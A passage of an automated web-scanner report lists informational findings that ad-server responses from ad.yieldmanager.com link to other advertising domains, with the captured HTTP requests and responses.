Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:31:50 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601910_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGljN9qgzAUxp.GOwn511SRXcTGDlnjVnAt80Zsks7SarrUofTpF-boC-xwOOf3Hb7zIZJQFmEDl42JjvSA40WCCFZLgmJDSQiTJCGIIhwtGaPhLU81FwjmfJUptuW.JWLxMpOfIuJbO6u3iINRAECtk-N8-pI
...[SNIP]...
KfZbnrCpyN8vHIn8KwHYZrQHiA1741GFyjzQTs1fQTULbzx-bowLX1prUzR2dubUAEhQFmd9ubk.aKLWDstTp4PvU344baNb22Xd1.dwfj6tY44w0Xq7zjBySCcrw=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601910_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601910_HERE" border="0" alt=""></a>
...[SNIP]...
19.64. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACWc6QAAAAAAD9DKAAAAAAAAAD8AQIAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB0fNrwOuHRCteMf2GbzkQc8kFzi5wTG15iFrWYAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6510%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D1549900456%26r%3D0%26s%3D2126909,aaffb95a-ed53-11e0-b079-78e7d162bc94,1317600442806 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=300x250&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:23 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0338.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:07:23 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777494);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317600442_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlUGFrgzAQ.TV-k5AYtYrsQ2xwyJpuBWmpX0STOJ3VuOio669fVkf.wI7j7r3j3Ts4hKPQrSGEpUR17Qos6whhh29QhbmzsWEURcgLwtD3EPbtKY0FoQimZHvi.oHcg4b0ZUWm0oAc0pW9BQRcKQCu0uy6jj5
...[SNIP]...
0z0bHs.H3umbd.LJIn227mebQwsZzEpACzLoVcgBrlsACuejMsaw3GxogSLWstp8bC1IWW49.UIFthmPnbL-eVwe0wST0XuhyE6ovhq6-kLhqppRFcFDeKH55CdBI=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317600442_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317600442_HERE" border="0" alt=""></a>
...[SNIP]...
19.65. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABOueIzEOXRCvocpygOopL5rxQ8fBRiebVhQlwCAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D1498328172%26r%3D0%26s%3D2126909,f4307068-ed55-11e0-b442-78e7d161534a,1317601424593 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:23:45 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0189.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:23:45 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601424_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGlT9FqgzAU.RrfJMTEqkX2EJt1yBqZkHW4lxJjnNJqbHTU-fULs.QHdrnce87h3APXw3Epy03ol15d16EohYg9jGSIBA4UdmEcxwhBHGKIotAd06Qi1IMp2T3LICd.Rbf0dUV20ojkemVvEQE3CoCvDbut0pV
...[SNIP]...
.OjBdzxhks7i.Z-yfXbaZpcDBx0N52BSYjKjUDPah-BlJ3VhS1AUNjTXujaqPGxsHUhw4KFt2rtrIs2MCt5bK0uO1HZaaTEX2lu1P.3ZXKnBpllDVctLSOX8m2c7k=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601424_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601424_HERE" border="0" alt=""></a>
...[SNIP]...
19.66. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADYg90dOOXRCkv9W31uXOaJHlcJu4r0XesXqZhDAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D3144707195%26r%3D0%26s%3D2126909,0bb01040-ed56-11e0-b328-78e7d16291b6,1317601464017 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:24:24 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0111.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:24:24 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601464_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGljFFrgzAUhX-NbxISTTUie4jNBFnTTQgr7qXYJE7X1rSpQ-evX5ilf2CXcHPO4bsHhWlSK4QiSOqmWTWY6BSFgYwDl0LswzRNMUpwHBNIYv9WZIoyBAu6fpZRSf-GJexlUW4zQkuzuDdCwcgAwMbycYmunMA
...[SNIP]...
H9vIq829573P2T77fDcPFC6gW5ewoMtlZ6Auai-wlIc3Zh3VhwaR2UW91YfWu9kGHoBdFset0p56IVTJyXB6e7.qbtsLd1r8x533-fD9ruW221A05GOuIXP-xzzQ==,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601464_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601464_HERE" border="0" alt=""></a>
...[SNIP]...
19.67. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsbv4S6uHRCsZBWrFpSzPiPf4Iic4EuzWrYG.kAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D1826082959%26r%3D0%26s%3D2126909,13d02e2e-ed54-11e0-b6da-78e7d162b00c,1317600618655 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:54 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0389.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:10:54 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317600618_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGlTtFugzAM.BreWJQACyC0h9AUia1UY0Kb6EtFE7ewFtIFJlq-flGp-gOzLPvudD6ZuJHwMbiV5wE44OCQRsR1hE.Ap9izcRRFhFDi0zB0ArtPY8k4wSlbLAXN2a14yN9mZCYPWK5m9h4wNHKEPKWzcZZ-sgA
...[SNIP]...
p5zIryWn6zsbz.ae5fbLsehrPlMstJTEs06ErCBakzdBckVGvEaq.RuTamRMNeQ19bLvew5dBJddBIw-gzDg0XO4Obrgc9bHXVSdVuu992B3pbgwZjOClhHH8GCHP.,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317600618_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317600618_HERE" border="0" alt=""></a>
...[SNIP]...
19.68. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAjoVr4SeTRCnCT01hh121xwr-ElGj9j1TkWGFGAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D1978687631%26r%3D0%26s%3D2126909,7d4f2ad4-ed55-11e0-bb70-78e7d1f507a4,1317601225145 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:20:25 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0060.rm.sp2
Set-Cookie: bh=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 00:20:25 GMT
Pragma: no-cache
Content-Length: 1590
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10777476);}
</script><script type="t
...[SNIP]...
<noscript><iframe id="4e3c55af5608c" name="4e3c55af5608c" src="http://psa-d.openx.com/w/1.0/afr?auid=34602&cb=

1317601225_HERE" frameborder="0" scrolling="no" width="160" height="600"><a href="http://ad.yieldmanager.com/clk?3,eAGljMtugzAQRb-GHbL8IDyEujBxqVADalRSRDcRsZ1CCZg6RNB8fa1S8QMdjWbOHd25iIQuCbxgU3HOiXRcfA4RwdzDHuaOsGEYhjiADiTQ9ZB9TSJBGYIJ3T5yd09.iwXseSEzmU.3alEvPgUTA8BROp2W01f
...[SNIP]...
dctGlRopSJOlsf6YNt1-M4WIRaODYtwKgrIWegBtnPgKvOHKuzBkNtTLGWZy2vtUWYAy3s3lUvG2GUu4GB0fxkuOmvUo9HXfVCdcf-1p2kPtZSS2O4KG4cPyftc9k=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c55af5608c&cb=1317601225_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34602&cs=4e3c55af5608c&cb=1317601225_HERE" border="0" alt=""></a>
...[SNIP]...
19.69. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /iframe3?Hv0hAJBoGgAnFoYAAAAAAHwwIgAAAAAAAAD8AQIAAAAAAP8A.wD..ziOJgAAAAAAJtcsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACTIxEAAAAAAAIAAgAAAAAAumx0zk9xnD-6bHTOT3GcP6lNnNzvUKQ.qU2c3O9QpD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABThIHDCPrRCk1snMRCLBJSPZqa77.0ztS7XLZNAAAAAA==,,http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html,B%3D10%26Z%3D300x250%26_salt%3D3038281923%26atf%3D1%26brw%3Dcr3%26cb%3D10909902593%26efo%3D0%26os%3Dwn7%26pfm%3D1%26prm%3D0%26r%3D0%26rtg%3Dga%26s%3D1730704%26tphv%3Dch%26ttvl%3Dch%26uatRandNo%3D1419,73842556-ed62-11e0-91db-78e7d1f5a930,1317606792173 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:53:13 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0050.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 01:53:13 GMT
Pragma: no-cache
Content-Length: 619
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(8787495);}
</script><script type="te
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
19.70. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IABKKqQAAAAAAD9DKAAAAAAAAAD8AQYAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAru.OJ1t7RCu8a7TEsU0sxGAgeoBu29n167UjeAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6511%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D728x90%26_salt%3D2258205715%26r%3D0%26s%3D2126909,3e0a55fe-ed52-11e0-8e89-93bbc1df9668,1317599830507 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=728x90&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:57:10 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0101.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:57:10 GMT
Pragma: no-cache
Content-Length: 1850
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10758730);}
</script><!--/* OpenX Ja
...[SNIP]...
<noscript><iframe id="4e52d0714c6aa" name="4e52d0714c6aa" src="http://psa-d.openx.com/w/1.0/afr?auid=34591&cb=1317599830_HERE" frameborder="0" scrolling="no" width="728" height="90"><a href="http://ad.yieldmanager.com/clk?3,eAGljE1ugzAQhU.DjlrYgAGhLkydVDSBNBEqIhvEjwlpABNDFcTpY5WKC3Q0mvne05uBugt1qzINbGGHlYaJTGmgwoKQ6Xmmaq7rIsPBNsKWA9XB90pCoeYTb7e7H8lvUYfuFpKT2uSYLOrTJuBBATC4CB6LdQ9
...[SNIP]...
ftx3cQn9pDlKDDekheVbUex17RiYK2skswiqxkE-A96yZQ8FaaWSVAX8vQVrBKsKFWdGpoCsIz79i1lAqbEEpd5JKv3cDEmIqsK3mbdj9tzkRaM8FkoOGFTDwB-eVycw==,http://psa-d.openx.com/w/1.0/rc?cs=4e52d0714c6aa&cb=1317599830_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?auid=34591&cs=4e52d0714c6aa&cb=1317599830_HERE" border="0" alt=""></a>
...[SNIP]...
19.71. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe3?sIBdAD10IACEc6QAAAAAAD9DKAAAAAAAAAD8AQoAAAAAAP8A.wD..4orMwAAAAAAqM80AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABo1BIAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbv7IlaeHRCmPyiUJU7w5zmIiNQFlOPR3415QOAAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D6509%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D160x600%26_salt%3D1313598906%26r%3D0%26s%3D2126909,c67c731c-ed53-11e0-9564-3c4a92f70634,1317600488922 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.yieldmanager.com/st?ad_type=iframe&ad_size=160x600&section=2126909
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1; OX_plg=swf,sl,qt,wmp,shk

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:10 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
